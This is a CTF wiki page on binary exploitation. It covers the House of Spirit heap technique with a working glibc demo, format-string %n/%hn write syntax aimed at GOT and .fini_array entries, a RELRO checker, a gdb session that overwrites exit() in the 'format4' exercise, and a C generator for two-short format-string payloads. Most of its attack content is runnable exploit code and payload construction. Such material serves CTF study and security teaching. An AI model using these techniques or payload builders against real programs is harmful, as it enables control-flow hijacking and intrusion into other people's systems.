Pwn - adeptex/CTF GitHub Wiki

Heap Exploitation

Forging Chunks

struct chunk {
  size_t prev_size;   /* size of the previous chunk, only meaningful when that chunk is free */
  size_t size;        /* chunk size; the low 3 bits are flags: PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA */
  struct chunk *fd;   /* forward/backward links, only present while the chunk is free */
  struct chunk *bck;  /* (in an allocated chunk these 16 bytes are user data) */
  char buf[0x10];     /* user data; the pointer malloc() returns points at fd, 16 bytes past the chunk start */
};

House of Spirit

  • The attacker controls a region of memory at a higher address than the one he is trying to change; how far above depends on the fake size written into the chunk that will be freed (see the third point)
  • A stack overflow lets the attacker overwrite a variable holding a chunk address returned by a malloc() call, pointing it into the controlled region
  • That pointer is freed: free() trusts the fake size field and puts the region on a fastbin. The size must be a valid fastbin size with IS_MMAPPED and NON_MAIN_ARENA clear, and the size field of the chunk that follows (at fake + size) must also look sane, or free() aborts with "invalid next size (fast)". On glibc 2.26 and later the tcache takes the chunk first and does not check the next size at all
  • Another chunk of the same size is allocated and malloc() hands back the fake chunk
  • The attacker controls the content written into this last chunk, which now overlaps whatever sits in the controlled region
  • Example
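The steps above, run against the live glibc allocator, as an added example (not code from the wiki): a fake chunk is built in stack memory, freed as if malloc() had returned it, and the next malloc() of the same size class hands it back. The function name house_of_spirit, the 0x40 chunk size and the stack region are choices made for this example; it assumes glibc on x86-64 (16-byte chunk alignment, 8-byte size_t) and works on both the fastbin path (older glibc) and the tcache path (glibc 2.26+).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FAKE_SIZE  0x40u   /* chunk size in fastbin and tcache range */
#define PREV_INUSE 0x1u

/* Returns 1 if malloc() returned the fake chunk, 0 if not, -1 on error. */
int house_of_spirit(void)
{
    /* 16 words = 128 bytes: the fake chunk (0x40) plus the header of the
     * chunk that would follow it.  This is the "region the attacker controls". */
    _Alignas(16) uint64_t region[16];
    memset(region, 0, sizeof region);

    /* Make sure the allocator (and this thread's tcache) is initialised. */
    void *primer = malloc(FAKE_SIZE - 0x10);
    if (primer == NULL)
        return -1;

    /* word 0: prev_size (ignored), word 1: size of the fake chunk.
     * IS_MMAPPED and NON_MAIN_ARENA must be clear or free() takes another
     * path; PREV_INUSE is set as it would be for a chunk in use. */
    region[1] = FAKE_SIZE | PREV_INUSE;

    /* Size field of the "next" chunk at region + FAKE_SIZE.  The fastbin
     * free path requires it to be > 2*SIZE_SZ and < system_mem, otherwise
     * it aborts with "free(): invalid next size (fast)".  The tcache path
     * never looks at it, which is why the technique has fewer constraints
     * on glibc >= 2.26. */
    region[FAKE_SIZE / 8 + 1] = FAKE_SIZE | PREV_INUSE;

    /* The pointer the overflow would plant: what malloc() would have
     * returned for this chunk, 16 bytes past the chunk header.  Laundered
     * through a volatile so the compiler cannot see a non-heap address
     * being passed to free(). */
    void *volatile planted = &region[2];
    void *fake_user = planted;

    free(fake_user);                        /* the free() of the overwritten pointer */

    void *got = malloc(FAKE_SIZE - 0x10);   /* request in the same size class */
    int success = (got == fake_user);

    /* Do not free `got`: it is stack memory.  Only the primer is real heap. */
    free(primer);
    return success;
}

int main(void)
{
    int r = house_of_spirit();
    if (r == 1)
        puts("malloc() returned the fake chunk: House of Spirit succeeded");
    else
        puts("malloc() did not return the fake chunk (non-glibc allocator or hardened build?)");
    return r == 1 ? 0 : 1;
}
```

In a real target the three things the attacker needs are exactly the three constants set here: a sane size field, a sane next-size field, and a malloc() of the matching size after the free().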

Format Strings

%n writes the number of bytes printed so far into the pointer found at printf argument OFFSET, so the value is chosen through padding:
Write UNSIGNED INTEGER VALUE to OFFSET: %VALUEu%OFFSET$n --> %1234u%420$n (pads the output to 1234 bytes, then writes 1234 through the pointer at argument 420, assuming nothing was printed before)
Write NUMBER OF CHARACTERS to OFFSET: %CHARSx%OFFSET$n (CHARS is the field width; whatever was already printed before it is added to the count)
Use %hn (2 bytes) or %hhn (1 byte) to build an address in pieces instead of padding by gigabytes; find OFFSET by probing with %OFFSET$p until the bytes of your own buffer show up

Things to look for:
- Stack based:
--- Return address
--- Function pointers
- Binary based:
--- GOT (writable as long as symbol binding is lazy)
----- readelf --relocs fmt.bin
----- gdb$ p system
------- write the address of system into the GOT entry of printf, for example, so the next printf(buf) runs system(buf)
------- RELRO must not be FULL (Full RELRO resolves every symbol at load time and makes the GOT read-only)
--- DTORS (.dtors in old toolchains, .fini_array in current ones: function pointers called at exit)
----- objdump -h -j .fini_array fmt.bin
------- write the target address into .fini_array at the VMA shown
------- RELRO must be DISABLED (Partial RELRO already makes .fini_array read-only)
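The RELRO conditions above are usually checked with checksec or readelf; the following program, added here and not part of the wiki, does the same check on the ELF headers directly so the distinction is explicit: a PT_GNU_RELRO segment gives Partial RELRO (.fini_array read-only, GOT still writable), and Partial becomes Full when the dynamic section also demands immediate binding (DT_BIND_NOW, DF_BIND_NOW or DF_1_NOW). The names classify_relro, build_sample_elf and relro_of_sample are this example's own; it assumes Linux's <elf.h> and handles ELF64 only. build_sample_elf constructs a minimal headers-only image to exercise the classifier offline.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum relro_level { RELRO_NONE = 0, RELRO_PARTIAL = 1, RELRO_FULL = 2 };

/* Classify RELRO of an ELF64 image held in memory. Returns -1 if malformed. */
int classify_relro(const unsigned char *img, size_t len)
{
    Elf64_Ehdr eh;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);                     /* copy: img may be unaligned */
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 || eh.e_ident[EI_CLASS] != ELFCLASS64)
        return -1;
    if (eh.e_phentsize != sizeof(Elf64_Phdr) || eh.e_phoff > len ||
        (len - eh.e_phoff) / sizeof(Elf64_Phdr) < eh.e_phnum)
        return -1;

    int has_relro = 0, bind_now = 0;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        memcpy(&ph, img + eh.e_phoff + i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_GNU_RELRO)
            has_relro = 1;                           /* at least Partial RELRO */
        if (ph.p_type != PT_DYNAMIC)
            continue;
        if (ph.p_offset > len || len - ph.p_offset < ph.p_filesz)
            return -1;
        /* Walk the dynamic section looking for an immediate-binding request. */
        for (size_t off = 0; off + sizeof(Elf64_Dyn) <= ph.p_filesz; off += sizeof(Elf64_Dyn)) {
            Elf64_Dyn d;
            memcpy(&d, img + ph.p_offset + off, sizeof d);
            if (d.d_tag == DT_NULL) break;
            if (d.d_tag == DT_BIND_NOW) bind_now = 1;
            if (d.d_tag == DT_FLAGS && (d.d_un.d_val & DF_BIND_NOW)) bind_now = 1;
            if (d.d_tag == DT_FLAGS_1 && (d.d_un.d_val & DF_1_NOW)) bind_now = 1;
        }
    }
    if (!has_relro) return RELRO_NONE;
    return bind_now ? RELRO_FULL : RELRO_PARTIAL;
}

/* Constructed minimal ELF64 image (headers only, no code) for testing:
 * a PT_DYNAMIC segment, optionally a PT_GNU_RELRO one, and a dynamic
 * section carrying DT_FLAGS_1. Returns the image length, 0 if buf is too small. */
size_t build_sample_elf(unsigned char *buf, size_t buf_len, int with_relro, int bind_now)
{
    Elf64_Ehdr eh; Elf64_Phdr ph[2]; Elf64_Dyn dyn[2];
    size_t dyn_off = sizeof eh + sizeof ph, total = dyn_off + sizeof dyn;
    if (buf_len < total) return 0;
    memset(&eh, 0, sizeof eh); memset(ph, 0, sizeof ph); memset(dyn, 0, sizeof dyn);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_type = ET_DYN; eh.e_machine = EM_X86_64;
    eh.e_phoff = sizeof eh; eh.e_phentsize = sizeof(Elf64_Phdr); eh.e_phnum = 2;
    ph[0].p_type = PT_DYNAMIC; ph[0].p_offset = dyn_off; ph[0].p_filesz = sizeof dyn;
    ph[1].p_type = with_relro ? PT_GNU_RELRO : PT_NULL;
    dyn[0].d_tag = DT_FLAGS_1; dyn[0].d_un.d_val = bind_now ? DF_1_NOW : 0;
    dyn[1].d_tag = DT_NULL;
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, ph, sizeof ph);
    memcpy(buf + dyn_off, dyn, sizeof dyn);
    return total;
}

/* Build a sample image with the given properties and classify it. */
int relro_of_sample(int with_relro, int bind_now)
{
    unsigned char buf[256];
    size_t n = build_sample_elf(buf, sizeof buf, with_relro, bind_now);
    return n ? classify_relro(buf, n) : -1;
}

int main(int argc, char **argv)
{
    static const char *names[] = { "No RELRO: GOT and .fini_array writable",
                                   "Partial RELRO: GOT writable, .fini_array read-only",
                                   "Full RELRO: neither writable" };
    if (argc != 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 2; }
    fseek(f, 0, SEEK_END); long sz = ftell(f); rewind(f);
    if (sz < 0) { fclose(f); return 2; }
    unsigned char *img = malloc((size_t)sz + 1);
    size_t got = img ? fread(img, 1, (size_t)sz, f) : 0;
    fclose(f);
    int r = classify_relro(img, got);
    free(img);
    if (r < 0) { fputs("not a valid ELF64 image\n", stderr); return 2; }
    puts(names[r]);
    return 0;
}
```

Run it on fmt.bin to decide which of the two targets above is still writable before building the payload.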


# rewrite exit() call @ 0x08049724 with 0x080484b4 in two short writes
# (the payload's two addresses sit at printf arguments 4 and 5; the
#  smaller half, 0x0804, has to be written first because the byte count only grows)

(gdb) shell objdump -t format4 | grep hello
080484b4 g     F .text	0000001e              hello
# addresses: 0x08049724 takes the low half (arg 4), 0x08049726 the high half (arg 5)
(gdb) shell echo `python -c 'print "\x24\x97\x04\x08" + "\x26\x97\x04\x08"'` > /tmp/a
# the 8 address bytes are already counted, so pad by 0x0804 - 8 to reach a count of 0x0804
(gdb) p 0x0804 - 8
$2 = 2044
(gdb) shell echo `python -c 'print "\x24\x97\x04\x08" + "\x26\x97\x04\x08" + "%2044u%5$hn"'` > /tmp/a
# the count is now 0x0804; pad up to 0x84b4 and write the low half through arg 4
(gdb) p 0x84b4 - 0x0804
$3 = 31920
(gdb) shell echo `python -c 'print "\x24\x97\x04\x08" + "\x26\x97\x04\x08" + "%2044u%5$hn" + "%31920u%4$hn"'` > /tmp/a
(gdb) r < /tmp/a
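The two paddings in the session above were computed by hand; the following program, added here and not part of the wiki, generalises that arithmetic to any 32-bit target and value: it splits the value into two shorts, orders the writes so every padding is positive, wraps the counter through 0x10000 when needed and refuses addresses that contain a NUL byte. The names build_two_short_write and payload_equals are this example's own; it assumes a 32-bit little-endian target, that the two addresses at the start of the payload are visible to printf as positional arguments arg_index and arg_index+1 (4 and 5 in the session above), and that the %u conversions, which consume the next unused arguments, are accepted alongside positional ones as glibc does.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Emit [addr][addr+2]%<pad1>u%<idx1>$hn%<pad2>u%<idx2>$hn into out.
 * `already` is the number of bytes printf output before the payload.
 * Returns the payload length, or -1 if it does not fit or an address
 * byte is 0 (a NUL would end the format string early). */
int build_two_short_write(uint32_t target, uint32_t value, unsigned arg_index,
                          size_t already, unsigned char *out, size_t out_len)
{
    struct half { uint32_t addr; unsigned val; unsigned idx; } w[2] = {
        { target,     value & 0xffffu, arg_index     },   /* low 16 bits  */
        { target + 2, value >> 16,     arg_index + 1 },   /* high 16 bits */
    };
    /* The byte counter only grows, so the smaller value is written first. */
    if (w[0].val > w[1].val) { struct half t = w[0]; w[0] = w[1]; w[1] = t; }

    if (out_len < 8) return -1;
    for (int i = 0; i < 2; i++) {
        uint32_t a = (i == 0) ? target : target + 2;
        for (int b = 0; b < 4; b++) {
            unsigned char c = (unsigned char)(a >> (8 * b));
            if (c == 0) return -1;
            out[4 * i + b] = c;                       /* little-endian */
        }
    }
    size_t pos = 8;
    unsigned printed = (unsigned)((already + 8) & 0xffffu);
    for (int i = 0; i < 2; i++) {
        unsigned pad = (w[i].val + 0x10000u - printed) & 0xffffu;
        /* %<pad>u prints at least pad characters; if pad is below the widest
         * possible decimal (10 digits) the output could overshoot, so go
         * round once more: %hn keeps only the low 16 bits of the count. */
        if (pad < 10) pad += 0x10000u;
        int n = snprintf((char *)out + pos, out_len - pos, "%%%uu%%%u$hn", pad, w[i].idx);
        if (n < 0 || (size_t)n >= out_len - pos) return -1;
        pos += (size_t)n;
        printed = (printed + pad) & 0xffffu;
    }
    return (int)pos;
}

/* Build a payload and compare it byte-for-byte with an expected (NUL-free) string. */
int payload_equals(uint32_t target, uint32_t value, unsigned arg_index,
                   size_t already, const char *expected)
{
    unsigned char buf[128];
    int n = build_two_short_write(target, value, arg_index, already, buf, sizeof buf);
    return n > 0 && (size_t)n == strlen(expected) && memcmp(buf, expected, (size_t)n) == 0;
}

int main(void)
{
    unsigned char buf[128];
    int n = build_two_short_write(0x08049724u, 0x080484b4u, 4, 0, buf, sizeof buf);
    if (n < 0) { fputs("cannot build payload\n", stderr); return 1; }
    /* Print as a Python byte string, ready to paste into the echo above. */
    fputs("payload: \"", stdout);
    for (int i = 0; i < n; i++) {
        if (buf[i] >= 0x20 && buf[i] < 0x7f && buf[i] != '"' && buf[i] != '\\')
            putchar(buf[i]);
        else
            printf("\\x%02x", buf[i]);
    }
    puts("\"");
    return 0;
}
```

For the session's target and value the output is exactly the string built by hand above, which is the quickest sanity check when adapting it to another binary.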